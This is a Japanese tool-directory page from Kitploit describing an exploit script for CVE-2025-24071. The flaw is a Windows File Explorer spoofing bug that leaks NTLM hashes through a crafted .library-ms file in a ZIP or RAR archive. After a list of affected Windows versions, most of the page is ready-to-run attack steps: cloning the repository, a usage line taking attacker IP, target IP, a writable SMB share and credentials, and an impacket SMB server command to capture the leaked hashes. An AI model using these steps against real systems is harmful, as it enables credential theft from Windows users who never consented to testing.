Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/f4dee-backup/cve-2025-24071
パスワードクラッキング脆弱性分析エクスプロイトデータ流出ネットワークセキュリティ
GitHubf4dee-backup/cve-2025-24071

CVE-2025-24071

Windows ファイルエクスプローラーのなりすまし脆弱性 - CVE-2025-24071

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24071

Windows File Explorer のなりすまし脆弱性 - CVE-2025-24071

操作されたZIPまたはRARファイルの抽出、および .library-ms ファイル(Windowsがライブラリやネットワーク接続を指定するために使用するファイルの種類)の処理における脆弱性を悪用することにより、Windows の NTLM ハッシュを漏洩させます。

影響を受けるバージョン

Windows 10 Version 1809 for x64-based Systems Windows 10 Version 1809 for 32-bit Systems Windows Server 2025 (Server Core installation) Windows Server 2025 Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2016 (Server Core installation) Windows Server 2016 Windows 10 Version 1607 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 for 32-bit Systems Windows 11 Version 24H2 for x64-based Systems Windows 11 Version 24H2 for ARM64-based Systems Windows Server 2022, 23H2 Edition (Server Core installation) Windows 11 Version 23H2 for x64-based Systems Windows 11 Version 23H2 for ARM64-based Systems Windows 10 Version 22H2 for 32-bit Systems Windows 10 Version 22H2 for ARM64-based Systems Windows 10 Version 22H2 for x64-based Systems Windows 11 Version 22H2 for x64-based Systems Windows 11 Version 22H2 for ARM64-based Systems Windows 10 Version 21H2 for x64-based Systems Windows 10 Version 21H2 for ARM64-based Systems Windows 10 Version 21H2 for 32-bit Systems Windows Server 2022 (Server Core installation) Windows Server 2022 Windows Server 2019 (Server Core installation) Windows Server 2019

インストール:

root@kitploit:~
git clone https://github.com/f4dee-backup/CVE-2025-24071
root@kitploit:~
cd CVE-2025-24071
root@kitploit:~
chmod +x CVE-2025-24071.sh

ヘルプパネル:

root@kitploit:~
./CVE-2025-24071.sh -h
	-i) あなたのIPアドレス
	-t) ターゲットIP
	-d) 書き込み権限のあるリモートSMB共有 (例: C, ADMIN, IPC, SYSVOL など)
	-u) ユーザー名
	-p) パスワード
	-h) このヘルプパネルを表示

使い方:

root@kitploit:~
./CVE-2025-24071.sh -i "YOUR_IP" -t "TARGET_IP" -d "DIRECTORY_WRITE_REMOTE" -u "USER" -p "PASSWORD"

SMBサーバーを起動:

root@kitploit:~
impacket-smbserver smbFolder $(pwd) -smb2support
ツールをダウンロード